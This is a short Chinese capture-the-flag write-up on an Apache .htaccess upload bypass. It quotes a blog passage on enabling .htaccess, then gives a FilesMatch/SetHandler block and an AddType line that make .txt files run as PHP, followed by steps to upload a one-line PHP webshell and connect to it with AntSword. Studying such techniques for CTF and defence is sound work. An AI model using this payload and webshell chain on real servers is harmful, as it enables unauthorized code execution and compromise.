了解一下题目所说的htaccess文件。
他是Apache服务器中的一个配置文件,它负责相关目录下的网页配置,属于后端中间件的验证。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。看来权限还很大啊。
要想使.htaccess文件生效,需要两个条件:
一是在Apache的配置文件中写上:AllowOverride All
若这样写则.htaccess不会生效:AllowOverride None
二是Apache要加载mod_Rewrite模块。加载该模块,需要在Apache的配置文件中写上:LoadModule rewrite_module /usr/lib/apache2/modules/mod_rewrite.so
若是在Ubuntu中,可能还需要执行命令:sudo a2enmod rewrite
配置完后需要重启Apache。
————————————————
版权声明:本文为CSDN博主「skynet_x」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/skynet_x/article/details/109285482
但是可以尝试一下不就知道了吗,😀。
其中.htaccess的文件内容:SetHandler application/x-http-php的意思是设置当前目录所有文件都使用php解析,那么无论上传任何文件,只要符合php语言代码规范,就会被当做PHP执行。不符合规则则报错。(.htaccess就是文件的后缀)
那么我们可以先写个htaccess文件。如下:
<FilesMatch "txt">
SetHandler application/x-httpd-php
</FilesMatch>
或者
AddType application/X-httpd-php .txt
设置当前目录所有txt文件都使用php解析。
然后再上传一个一句话木马的txt文件。
再用蚁剑。